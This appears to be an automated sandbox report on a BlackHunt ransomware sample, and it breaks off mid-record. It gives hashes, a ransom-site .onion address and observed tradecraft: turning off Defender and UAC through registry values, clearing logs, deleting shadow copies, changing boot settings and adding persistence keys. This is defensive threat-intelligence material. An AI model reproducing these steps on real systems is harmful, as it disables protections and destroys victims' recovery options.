Analysis
-
max time kernel
91s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:29
Static task
static1
Behavioral task
behavioral1
Sample
5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe
Resource
win10v2004-20231215-en
General
-
Target
5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe
-
Size
707KB
-
MD5
43cdbedfc35dface2193eaca9d9cb4ae
-
SHA1
b2ecf41ae92ae299379076661c4743eeb8840ad2
-
SHA256
5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd
-
SHA512
3fff43967958289b1c42cada5b6488992c7baa41e85a121b72e66ab2579be8be563876f5a4e9135011583090ef3ebbb900664a0146d3e8299cd7b01cfdaa25ba
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1r8Lvnh:6uaTmkZJ+naie5OTamgEoKxLWibh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5140 fsutil.exe 6876 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 11164 wevtutil.exe 5976 wevtutil.exe 8660 wevtutil.exe 11184 wevtutil.exe 7364 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3628 bcdedit.exe 7964 bcdedit.exe 3484 bcdedit.exe 4624 bcdedit.exe -
Renames multiple (3374) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 9000 wbadmin.exe 9260 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Y: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\U: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\K: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\X: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\B: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\Q: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\P: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\A: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\W: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\H: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\I: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\E: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\O: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\S: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\M: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\R: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\G: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\L: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\N: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\J: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened (read-only) \??\V: 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster2x.jpg 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_filter_18.svg 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ar-ae\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\ui-strings.js 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\plugin-selectors.css 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line_2x.png 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\jaccess.jar 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\ui-strings.js 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\ui-strings.js 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\new_icons.png 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-sl\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\et_get.svg 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxslt.md 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\ui-strings.js 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#BlackHunt_ReadMe.txt 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-ae\#BlackHunt_Private.key 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info.png 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\#BlackHunt_ReadMe.hta 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover_2x.png 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 7004 15240 WerFault.exe 290 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3436 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 14500 vssadmin.exe 768 vssadmin.exe 4208 vssadmin.exe 4564 vssadmin.exe 2232 vssadmin.exe 1896 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 6912 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 15332 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Token: SeRestorePrivilege 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Token: SeBackupPrivilege 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Token: SeTakeOwnershipPrivilege 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Token: SeAuditPrivilege 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Token: SeSecurityPrivilege 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Token: SeIncBasePriorityPrivilege 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Token: SeBackupPrivilege 4620 Process not Found Token: SeRestorePrivilege 4620 Process not Found Token: SeAuditPrivilege 4620 Process not Found Token: SeBackupPrivilege 5392 wbengine.exe Token: SeRestorePrivilege 5392 wbengine.exe Token: SeSecurityPrivilege 5392 wbengine.exe Token: SeSecurityPrivilege 11164 wevtutil.exe Token: SeBackupPrivilege 11164 wevtutil.exe Token: SeSecurityPrivilege 5976 wevtutil.exe Token: SeBackupPrivilege 5976 wevtutil.exe Token: SeSecurityPrivilege 8660 wevtutil.exe Token: SeBackupPrivilege 8660 wevtutil.exe Token: SeSecurityPrivilege 11184 wevtutil.exe Token: SeBackupPrivilege 11184 wevtutil.exe Token: SeSecurityPrivilege 7364 wevtutil.exe Token: SeBackupPrivilege 7364 wevtutil.exe Token: SeDebugPrivilege 6912 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4424 wrote to memory of 1676 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 162 PID 4424 wrote to memory of 1676 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 162 PID 4424 wrote to memory of 4760 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 160 PID 4424 wrote to memory of 4760 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 160 PID 4424 wrote to memory of 3828 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 159 PID 4424 wrote to memory of 3828 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 159 PID 4424 wrote to memory of 2500 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 157 PID 4424 wrote to memory of 2500 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 157 PID 4424 wrote to memory of 4588 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 156 PID 4424 wrote to memory of 4588 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 156 PID 4424 wrote to memory of 2404 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 153 PID 4424 wrote to memory of 2404 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 153 PID 1676 wrote to memory of 2668 1676 cmd.exe 154 PID 1676 wrote to memory of 2668 1676 cmd.exe 154 PID 4760 wrote to memory of 1944 4760 cmd.exe 38 PID 4760 wrote to memory of 1944 4760 cmd.exe 38 PID 4424 wrote to memory of 212 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 151 PID 4424 wrote to memory of 212 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 151 PID 4424 wrote to memory of 1760 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 149 PID 4424 wrote to memory of 1760 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 149 PID 3828 wrote to memory of 828 3828 cmd.exe 148 PID 3828 wrote to memory of 828 3828 cmd.exe 148 PID 4588 wrote to memory of 2900 4588 cmd.exe 147 PID 4588 wrote to memory of 2900 4588 cmd.exe 147 PID 2500 wrote to memory of 4996 2500 cmd.exe 40 PID 2500 wrote to memory of 4996 2500 cmd.exe 40 PID 4424 wrote to memory of 1512 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 146 PID 4424 wrote to memory of 1512 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 146 PID 2404 wrote to memory of 3632 2404 cmd.exe 